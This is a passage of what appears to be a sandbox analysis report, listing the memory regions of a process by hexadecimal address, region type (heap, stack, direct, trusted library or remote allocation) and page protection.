page read and write
|
||
1B0DF000
|
stack
|
page read and write
|
||
30C000
|
heap
|
page read and write
|
||
4CD6000
|
heap
|
page read and write
|
||
220000
|
direct allocation
|
page read and write
|
||
21760000
|
trusted library allocation
|
page read and write
|
||
39D000
|
heap
|
page read and write
|
||
4ABF000
|
heap
|
page read and write
|
||
8FD000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
4ABC000
|
heap
|
page read and write
|
||
3050000
|
trusted library allocation
|
page read and write
|
||
37BB000
|
heap
|
page read and write
|
||
2AB7000
|
trusted library allocation
|
page read and write
|
||
1B2B0000
|
heap
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
2200C000
|
stack
|
page read and write
|
||
1B6000
|
heap
|
page read and write
|
||
4B14000
|
heap
|
page read and write
|
||
194000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
4CDD000
|
heap
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
6510000
|
remote allocation
|
page read and write
|
||
142000
|
heap
|
page read and write
|
||
4CCA000
|
heap
|
page read and write
|
||
2A9E000
|
stack
|
page read and write
|
||
6710000
|
trusted library allocation
|
page execute and read and write
|
||
24A00000
|
heap
|
page read and write
|
||
2684000
|
heap
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
84000
|
trusted library allocation
|
page read and write
|
||
240000
|
direct allocation
|
page read and write
|
||
6654000
|
heap
|
page read and write
|
||
4901000
|
heap
|
page read and write
|
||
7FE89883000
|
trusted library allocation
|
page execute and read and write
|
||
1A5C9000
|
heap
|
page read and write
|
||
5F50000
|
heap
|
page read and write
|
||
287000
|
trusted library allocation
|
page execute and read and write
|
||
3A1E000
|
stack
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
4D1F000
|
heap
|
page read and write
|
||
1824000
|
remote allocation
|
page execute and read and write
|
||
38D5000
|
trusted library allocation
|
page read and write
|
||
27A000
|
trusted library allocation
|
page execute and read and write
|
||
1CFD000
|
direct allocation
|
page read and write
|
||
4AAE000
|
heap
|
page read and write
|
||
215B1000
|
trusted library allocation
|
page read and write
|
||
122000
|
heap
|
page read and write
|
||
21640000
|
trusted library allocation
|
page read and write
|
||
38F000
|
heap
|
page read and write
|
||
36F3000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
3763000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
21800000
|
trusted library allocation
|
page read and write
|
||
89000
|
stack
|
page read and write
|
||
4D35000
|
heap
|
page read and write
|
||
892000
|
heap
|
page read and write
|
||
3E6A000
|
stack
|
page read and write
|
||
27B5000
|
heap
|
page read and write
|
||
6631000
|
heap
|
page read and write
|
||
376B000
|
heap
|
page read and write
|
||
37BB000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
4B22000
|
heap
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
586000
|
heap
|
page read and write
|
||
1C80000
|
heap
|
page read and write
|
||
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
329000
|
heap
|
page read and write
|
||
3467000
|
direct allocation
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
324000
|
heap
|
page read and write
|
||
1CE000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
7FE89AC0000
|
trusted library allocation
|
page read and write
|
||
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
1C7AE000
|
stack
|
page read and write
|
||
38C9000
|
trusted library allocation
|
page read and write
|
||
2AAA000
|
trusted library allocation
|
page read and write
|
||
5FA0000
|
heap
|
page read and write
|
||
2ABD000
|
trusted library allocation
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
8D000
|
trusted library allocation
|
page execute and read and write
|
||
2971000
|
trusted library allocation
|
page read and write
|
||
636000
|
heap
|
page read and write
|
||
21F80000
|
heap
|
page read and write
|
||
3473000
|
direct allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
4AB7000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
400000
|
unkown
|
page readonly
|
||
374D000
|
heap
|
page read and write
|
||
4D37000
|
heap
|
page read and write
|
||
7FE89A80000
|
trusted library allocation
|
page read and write
|
||
276000
|
trusted library allocation
|
page execute and read and write
|
||
21760000
|
trusted library allocation
|
page read and write
|
||
1A22C000
|
stack
|
page read and write
|
||
410000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
4B22000
|
heap
|
page read and write
|
||
4AB7000
|
heap
|
page read and write
|
||
297D000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
4AAE000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
1A64D000
|
heap
|
page read and write
|
||
4AB9000
|
heap
|
page read and write
|
||
3CE0000
|
heap
|
page read and write
|
||
2AAA000
|
trusted library allocation
|
page read and write
|
||
12001000
|
trusted library allocation
|
page read and write
|
||
190000
|
heap
|
page read and write
|
||
38D5000
|
trusted library allocation
|
page read and write
|
||
874000
|
heap
|
page read and write
|
||
4D3D000
|
heap
|
page read and write
|
||
297D000
|
trusted library allocation
|
page read and write
|
||
530000
|
heap
|
page read and write
|
||
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
196000
|
heap
|
page read and write
|
||
4CFA000
|
heap
|
page read and write
|
||
80000
|
trusted library allocation
|
page read and write
|
||
4A88000
|
heap
|
page read and write
|
||
4B1B000
|
heap
|
page read and write
|
||
2973000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
612A000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
24137000
|
heap
|
page read and write
|
||
1FB4000
|
heap
|
page read and write
|
||
21760000
|
trusted library allocation
|
page read and write
|
||
2453E000
|
stack
|
page read and write
|
||
2AB6000
|
trusted library allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
5F40000
|
heap
|
page read and write
|
||
194000
|
heap
|
page read and write
|
||
1CE000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
2ABA000
|
trusted library allocation
|
page read and write
|
||
36D6000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
4D37000
|
heap
|
page read and write
|
||
36CF000
|
heap
|
page read and write
|
||
4D21000
|
heap
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
401000
|
unkown
|
page execute read
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
21AB0000
|
heap
|
page execute and read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
3769000
|
heap
|
page read and write
|
||
2982000
|
trusted library allocation
|
page read and write
|
||
2AAA000
|
trusted library allocation
|
page read and write
|
||
1C54B000
|
stack
|
page read and write
|
||
21646000
|
trusted library allocation
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
21710000
|
trusted library allocation
|
page read and write
|
||
7FE89A33000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
7FE89966000
|
trusted library allocation
|
page execute and read and write
|
||
4A3A000
|
heap
|
page read and write
|
||
3280000
|
trusted library allocation
|
page read and write
|
||
6130000
|
heap
|
page read and write
|
||
371E000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
2AAE000
|
trusted library allocation
|
page read and write
|
||
21710000
|
trusted library allocation
|
page read and write
|
||
1A648000
|
heap
|
page read and write
|
||
4B06000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
371E000
|
heap
|
page read and write
|
||
297D000
|
trusted library allocation
|
page read and write
|
||
1E38000
|
stack
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
7FE89B50000
|
trusted library allocation
|
page read and write
|
||
24157000
|
heap
|
page read and write
|
||
4CDC000
|
heap
|
page read and write
|
||
27EB000
|
heap
|
page read and write
|
||
3C94000
|
trusted library allocation
|
page read and write
|
||
4C0000
|
heap
|
page read and write
|
||
21E4A000
|
stack
|
page read and write
|
||
21760000
|
trusted library allocation
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
83000
|
trusted library allocation
|
page execute and read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
534000
|
heap
|
page read and write
|
||
677D000
|
stack
|
page read and write
|
||
2260000
|
trusted library allocation
|
page read and write
|
||
3760000
|
heap
|
page read and write
|
||
65F2000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
54F000
|
heap
|
page read and write
|
||
4D2D000
|
heap
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
4AAC000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
7FE89B10000
|
trusted library allocation
|
page read and write
|
||
374F000
|
heap
|
page read and write
|
||
663F000
|
heap
|
page read and write
|
||
7FE89893000
|
trusted library allocation
|
page read and write
|
||
4ABA000
|
heap
|
page read and write
|
||
18F000
|
heap
|
page read and write
|
||
2979000
|
trusted library allocation
|
page read and write
|
||
7FE89884000
|
trusted library allocation
|
page read and write
|
||
4AB7000
|
heap
|
page read and write
|
||
245A000
|
trusted library allocation
|
page read and write
|
||
1FFF000
|
stack
|
page read and write
|
||
38C9000
|
trusted library allocation
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
1A000000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
7FE89A37000
|
trusted library allocation
|
page read and write
|
||
3440000
|
direct allocation
|
page read and write
|
||
2A0000
|
heap
|
page read and write
|
||
21710000
|
trusted library allocation
|
page read and write
|
||
7FE8993C000
|
trusted library allocation
|
page execute and read and write
|
||
170000
|
heap
|
page read and write
|
||
444000
|
heap
|
page read and write
|
||
20000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
24900000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
1C0E0000
|
heap
|
page read and write
|
||
5424000
|
remote allocation
|
page execute and read and write
|
||
1B04F000
|
stack
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
314000
|
heap
|
page read and write
|
||
3773000
|
heap
|
page read and write
|
||
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
7FE89BA0000
|
trusted library allocation
|
page read and write
|
||
550000
|
heap
|
page read and write
|
||
3753000
|
heap
|
page read and write
|
||
4D35000
|
heap
|
page read and write
|
||
67C8000
|
heap
|
page read and write
|
||
7FE89A62000
|
trusted library allocation
|
page read and write
|
||
4AAE000
|
heap
|
page read and write
|
||
5FA7000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
38D5000
|
trusted library allocation
|
page read and write
|
||
12010000
|
trusted library allocation
|
page read and write
|
||
2975000
|
trusted library allocation
|
page read and write
|
||
160000
|
direct allocation
|
page read and write
|
||
7FE8989B000
|
trusted library allocation
|
page read and write
|
||
1D0000
|
direct allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
178000
|
heap
|
page read and write
|
||
2D7C000
|
stack
|
page read and write
|
||
285000
|
trusted library allocation
|
page execute and read and write
|
||
5ED0000
|
direct allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
89000
|
heap
|
page read and write
|
||
3624000
|
remote allocation
|
page execute and read and write
|
||
38D0000
|
trusted library allocation
|
page read and write
|
||
65A0000
|
direct allocation
|
page read and write
|
||
3467000
|
direct allocation
|
page read and write
|
||
215B2000
|
trusted library allocation
|
page read and write
|
||
1C10000
|
trusted library allocation
|
page read and write
|
||
371E000
|
heap
|
page read and write
|
||
18F000
|
heap
|
page read and write
|
||
46D0000
|
heap
|
page read and write
|
||
60B0000
|
heap
|
page read and write
|
||
389000
|
heap
|
page read and write
|
||
22114000
|
trusted library allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
1C5E4000
|
heap
|
page read and write
|
||
21710000
|
trusted library allocation
|
page read and write
|
||
246F000
|
stack
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
1CFF000
|
direct allocation
|
page read and write
|
||
2ABD000
|
trusted library allocation
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
7FE89A90000
|
trusted library allocation
|
page read and write
|
||
38D0000
|
trusted library allocation
|
page read and write
|
||
7FE89A40000
|
trusted library allocation
|
page execute and read and write
|
||
4CD6000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
21710000
|
trusted library allocation
|
page read and write
|
||
39D000
|
heap
|
page read and write
|
||
54F000
|
heap
|
page read and write
|
||
1A8E9000
|
stack
|
page read and write
|
||
3760000
|
heap
|
page read and write
|
||
3FE0000
|
heap
|
page read and write
|
||
494C000
|
heap
|
page read and write
|
||
38D0000
|
trusted library allocation
|
page read and write
|
||
22F4000
|
heap
|
page read and write
|
||
1C5E0000
|
heap
|
page read and write
|
||
273000
|
stack
|
page read and write
|
||
380000
|
heap
|
page read and write
|
||
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
4D3D000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
217B0000
|
trusted library allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
7EF20000
|
trusted library allocation
|
page execute and read and write
|
||
23089000
|
trusted library allocation
|
page read and write
|
||
2982000
|
trusted library allocation
|
page read and write
|
||
1A9CF000
|
stack
|
page read and write
|
||
21710000
|
trusted library allocation
|
page read and write
|
||
260000
|
trusted library allocation
|
page read and write
|
||
22061000
|
trusted library allocation
|
page read and write
|
||
22F8000
|
heap
|
page read and write
|
||
3753000
|
heap
|
page read and write
|
||
4D3A000
|
heap
|
page read and write
|
||
24108000
|
heap
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
3CE9000
|
heap
|
page read and write
|
||
1BF25000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
BF000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
2260000
|
trusted library allocation
|
page read and write
|
||
4B24000
|
heap
|
page read and write
|
||
21700000
|
trusted library allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
2960000
|
remote allocation
|
page read and write
|
||
7FE89897000
|
trusted library allocation
|
page read and write
|
||
2660000
|
trusted library allocation
|
page execute read
|
||
4D3D000
|
heap
|
page read and write
|
||
32D4000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
4AB9000
|
heap
|
page read and write
|
||
2D9000
|
heap
|
page read and write
|
||
194000
|
heap
|
page read and write
|
||
40A000
|
unkown
|
page write copy
|
||
2C5000
|
stack
|
page read and write
|
||
1C1000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
248FD000
|
stack
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
317000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
2ABA000
|
trusted library allocation
|
page read and write
|
||
74000
|
heap
|
page read and write
|
||
36F3000
|
heap
|
page read and write
|
||
1E70000
|
heap
|
page read and write
|
||
215B3000
|
trusted library allocation
|
page read and write
|
||
560000
|
heap
|
page read and write
|
||
147000
|
heap
|
page read and write
|
||
7FE89930000
|
trusted library allocation
|
page read and write
|
||
4ABA000
|
heap
|
page read and write
|
||
1B6000
|
heap
|
page read and write
|
||
28C000
|
stack
|
page read and write
|
||
1A57F000
|
stack
|
page read and write
|
||
37B7000
|
heap
|
page read and write
|
||
4AB7000
|
heap
|
page read and write
|
||
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
2058000
|
trusted library allocation
|
page read and write
|
||
430000
|
unkown
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
2AB1000
|
trusted library allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
38C9000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
7FE89940000
|
trusted library allocation
|
page execute and read and write
|
||
217FE000
|
stack
|
page read and write
|
||
1A19E000
|
stack
|
page read and write
|
||
1C12C000
|
heap
|
page read and write
|
||
4A6A000
|
heap
|
page read and write
|
||
4D3D000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
494E000
|
heap
|
page read and write
|
||
36F3000
|
heap
|
page read and write
|
||
4D3D000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
1C17E000
|
heap
|
page read and write
|
||
21CAE000
|
stack
|
page read and write
|
||
4AAE000
|
heap
|
page read and write
|
||
21700000
|
trusted library allocation
|
page read and write
|
||
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
659F000
|
unkown
|
page read and write
|
||
1AF99000
|
heap
|
page read and write
|
||
2982000
|
trusted library allocation
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
217B0000
|
trusted library allocation
|
page read and write
|
||
2175D000
|
stack
|
page read and write
|
||
4D2D000
|
heap
|
page read and write
|
||
395000
|
heap
|
page read and write
|
||
4FE000
|
heap
|
page read and write
|
||
554000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
241A1000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
4ABC000
|
heap
|
page read and write
|
||
244FD000
|
stack
|
page read and write
|
||
22F0000
|
heap
|
page read and write
|
||
4B07000
|
heap
|
page read and write
|
||
297D000
|
trusted library allocation
|
page read and write
|
||
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
38D0000
|
trusted library allocation
|
page read and write
|
||
38C9000
|
trusted library allocation
|
page read and write
|
||
36D7000
|
heap
|
page read and write
|
||
2ABD000
|
trusted library allocation
|
page read and write
|
||
21B2E000
|
stack
|
page read and write
|
||
596000
|
heap
|
page read and write
|
||
194000
|
heap
|
page read and write
|
||
1D50000
|
heap
|
page execute and read and write
|
||
375B000
|
heap
|
page read and write
|
||
21600000
|
heap
|
page read and write
|
||
6510000
|
remote allocation
|
page read and write
|
||
4B22000
|
heap
|
page read and write
|
||
1A7F8000
|
stack
|
page read and write
|
||
7FE899A0000
|
trusted library allocation
|
page execute and read and write
|
||
1B6000
|
heap
|
page read and write
|
||
4A01000
|
heap
|
page read and write
|
||
1B0000
|
direct allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
2AA8000
|
trusted library allocation
|
page read and write
|
||
21A8C000
|
stack
|
page read and write
|
||
2ABD000
|
trusted library allocation
|
page read and write
|
||
446000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
4CF5000
|
heap
|
page read and write
|
||
180000
|
direct allocation
|
page read and write
|
||
56B000
|
heap
|
page read and write
|
||
1AC0000
|
heap
|
page read and write
|
||
2AB4000
|
trusted library allocation
|
page read and write
|
||
2973000
|
trusted library allocation
|
page read and write
|
||
374D000
|
heap
|
page read and write
|
||
373B000
|
heap
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
4D35000
|
heap
|
page read and write
|
||
4024000
|
remote allocation
|
page execute and read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
7FE89A50000
|
trusted library allocation
|
page execute and read and write
|
||
67BE000
|
stack
|
page read and write
|
||
3760000
|
heap
|
page read and write
|
||
1A908000
|
heap
|
page execute and read and write
|
||
1CE000
|
heap
|
page read and write
|
||
4B1A000
|
heap
|
page read and write
|
||
4D1F000
|
heap
|
page read and write
|
||
4D21000
|
heap
|
page read and write
|
||
3730000
|
heap
|
page read and write
|
||
3546000
|
trusted library allocation
|
page read and write
|
||
1BF5B000
|
heap
|
page read and write
|
||
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
1C40000
|
trusted library allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
1C6000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
2001000
|
trusted library allocation
|
page read and write
|
||
4A03000
|
heap
|
page read and write
|
||
194000
|
heap
|
page read and write
|
||
37BB000
|
heap
|
page read and write
|
||
282000
|
trusted library allocation
|
page read and write
|
||
3753000
|
heap
|
page read and write
|
||
3500000
|
heap
|
page read and write
|
||
7FE89A70000
|
trusted library allocation
|
page execute and read and write
|
||
313000
|
heap
|
page read and write
|
||
65D4000
|
heap
|
page read and write
|
||
16D000
|
heap
|
page read and write
|
||
21800000
|
trusted library allocation
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
1B6000
|
heap
|
page read and write
|
||
4C7000
|
heap
|
page read and write
|
||
38C9000
|
trusted library allocation
|
page read and write
|
||
6115000
|
heap
|
page read and write
|
||
1C9CF000
|
stack
|
page read and write
|
||
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
322A000
|
stack
|
page read and write
|
||
4A03000
|
heap
|
page read and write
|
||
21DDE000
|
stack
|
page read and write
|
||
3753000
|
heap
|
page read and write
|
||
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
11C000
|
heap
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
2AAE000
|
trusted library allocation
|
page read and write
|
||
297E000
|
trusted library allocation
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
1EA6000
|
heap
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
1C13D000
|
heap
|
page read and write
|
||
36CF000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
216E0000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4CC0000
|
heap
|
page read and write
|
||
38D0000
|
trusted library allocation
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
2DF000
|
heap
|
page read and write
|
||
2B6000
|
heap
|
page read and write
|
||
562000
|
heap
|
page read and write
|
||
7FE000
|
stack
|
page read and write
|
||
21870000
|
trusted library allocation
|
page read and write
|
||
4AB9000
|
heap
|
page read and write
|
||
14D000
|
heap
|
page read and write
|
||
37D000
|
heap
|
page read and write
|
||
1CC0000
|
heap
|
page execute and read and write
|
||
21B8E000
|
stack
|
page read and write
|
||
52A000
|
heap
|
page read and write
|
||
4D37000
|
heap
|
page read and write
|
||
23061000
|
trusted library allocation
|
page read and write
|
||
1AE76000
|
heap
|
page read and write
|
||
1CE7000
|
direct allocation
|
page read and write
|
||
2982000
|
trusted library allocation
|
page read and write
|
||
1B1CC000
|
stack
|
page read and write
|
||
3420000
|
direct allocation
|
page read and write
|
||
220F8000
|
trusted library allocation
|
page read and write
|
||
3580000
|
trusted library allocation
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
38C9000
|
trusted library allocation
|
page read and write
|
||
408000
|
unkown
|
page readonly
|
||
38D0000
|
trusted library allocation
|
page read and write
|
||
106000
|
heap
|
page read and write
|
||
136000
|
heap
|
page read and write
|
||
218BE000
|
stack
|
page read and write
|
||
22117000
|
trusted library allocation
|
page read and write
|
||
147000
|
heap
|
page read and write
|
||
3753000
|
heap
|
page read and write
|
||
86E000
|
stack
|
page read and write
|
||
194000
|
heap
|
page read and write
|
||
245E000
|
trusted library allocation
|
page read and write
|
||
5E24000
|
remote allocation
|
page execute and read and write
|
||
24068000
|
trusted library allocation
|
page read and write
|
||
7FE8988D000
|
trusted library allocation
|
page execute and read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
4A03000
|
heap
|
page read and write
|
||
215FE000
|
stack
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
438F000
|
stack
|
page read and write
|
||
1E80000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
1D00000
|
direct allocation
|
page read and write
|
||
194000
|
heap
|
page read and write
|
||
4D2D000
|
heap
|
page read and write
|
||
4D37000
|
heap
|
page read and write
|
||
297B000
|
trusted library allocation
|
page read and write
|
||
2AA8000
|
trusted library allocation
|
page read and write
|
||
38D5000
|
trusted library allocation
|
page read and write
|
||
36D6000
|
heap
|
page read and write
|
||
371C000
|
heap
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
4D35000
|
heap
|
page read and write
|
||
39D8000
|
trusted library allocation
|
page read and write
|
||
14E000
|
heap
|
page read and write
|
||
4B22000
|
heap
|
page read and write
|
||
244AD000
|
stack
|
page read and write
|
||
2C60000
|
trusted library allocation
|
page execute
|
||
215B3000
|
trusted library allocation
|
page read and write
|
||
1CE000
|
heap
|
page read and write
|
||
8B0000
|
heap
|
page read and write
|
||
4D21000
|
heap
|
page read and write
|
||
1C0000
|
direct allocation
|
page read and write
|
||
54F000
|
heap
|
page read and write
|
||
219AE000
|
stack
|
page read and write
|
||
1A93E000
|
heap
|
page execute and read and write
|
||
1A900000
|
heap
|
page execute and read and write
|
||
39E000
|
heap
|
page read and write
|
||
21C1E000
|
stack
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
2AA8000
|
trusted library allocation
|
page read and write
|
||
4AB9000
|
heap
|
page read and write
|
||
21F4F000
|
stack
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
60F0000
|
heap
|
page read and write
|
||
609E000
|
unkown
|
page read and write
|
||
371C000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
4CF7000
|
heap
|
page read and write
|
||
1AE40000
|
heap
|
page read and write
|
||
22020000
|
heap
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
362E000
|
trusted library allocation
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
4B22000
|
heap
|
page read and write
|
||
218C0000
|
trusted library allocation
|
page read and write
|
||
3473000
|
direct allocation
|
page read and write
|
||
373B000
|
heap
|
page read and write
|
||
38D5000
|
trusted library allocation
|
page read and write
|
||
2ABD000
|
trusted library allocation
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
3C60000
|
trusted library allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
7FE89A3C000
|
trusted library allocation
|
page read and write
|
||
494C000
|
heap
|
page read and write
|
||
4B12000
|
heap
|
page read and write
|
||
374F000
|
heap
|
page read and write
|
||
8D5000
|
heap
|
page read and write
|
||
2977000
|
trusted library allocation
|
page read and write
|
||
2AA5000
|
trusted library allocation
|
page read and write
|
||
3749000
|
heap
|
page read and write
|
||
375C000
|
heap
|
page read and write
|
||
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
2410B000
|
heap
|
page read and write
|
||
3760000
|
heap
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
21650000
|
trusted library allocation
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
1F70000
|
direct allocation
|
page read and write
|
||
4CF5000
|
heap
|
page read and write
|
||
216E1000
|
trusted library allocation
|
page read and write
|
||
215B0000
|
trusted library allocation
|
page read and write
|
||
2AB5000
|
trusted library allocation
|
page read and write
|
||
372000
|
heap
|
page read and write
|
||
141000
|
heap
|
page read and write
|
||
4B09000
|
heap
|
page read and write
|
||
1C112000
|
heap
|
page read and write
|
||
14C000
|
heap
|
page read and write
|
||
2977000
|
trusted library allocation
|
page read and write
|
||
10000
|
heap
|
page read and write
|
||
4AAE000
|
heap
|
page read and write
|
||
297B000
|
trusted library allocation
|
page read and write
|
||
1A580000
|
heap
|
page read and write
|
||
4B22000
|
heap
|
page read and write
|
||
7FE89A20000
|
trusted library allocation
|
page read and write
|
||
4D1F000
|
heap
|
page read and write
|
||
220C8000
|
trusted library allocation
|
page read and write
|
||
1CE000
|
heap
|
page read and write
|
||
360E000
|
trusted library allocation
|
page read and write
|
||
4CDB000
|
heap
|
page read and write
|
||
310000
|
heap
|
page read and write
|
||
4D21000
|
heap
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
12031000
|
trusted library allocation
|
page read and write
|
||
3769000
|
heap
|
page read and write
|
||
2DE000
|
heap
|
page read and write
|
||
287C000
|
trusted library allocation
|
page read and write
|
||
7FE89A88000
|
trusted library allocation
|
page read and write
|
||
38BB000
|
stack
|
page read and write
|
||
38D5000
|
trusted library allocation
|
page read and write
|
||
2C5B000
|
trusted library allocation
|
page read and write
|
||
1F90000
|
direct allocation
|
page read and write
|
||
1C1000
|
heap
|
page read and write
|
||
65B0000
|
direct allocation
|
page read and write
|
||
3760000
|
heap
|
page read and write
|
||
1DF0000
|
heap
|
page read and write
|
||
297B000
|
trusted library allocation
|
page read and write
|
||
2ABD000
|
trusted library allocation
|
page read and write
|
||
4D35000
|
heap
|
page read and write
|
||
7FE89882000
|
trusted library allocation
|
page read and write
|
||
217A8000
|
stack
|
page read and write
|
||
4ABA000
|
heap
|
page read and write
|
||
371C000
|
heap
|
page read and write
|
||
3230000
|
trusted library allocation
|
page read and write
|
||
435000
|
unkown
|
page read and write
|
||
4AAC000
|
heap
|
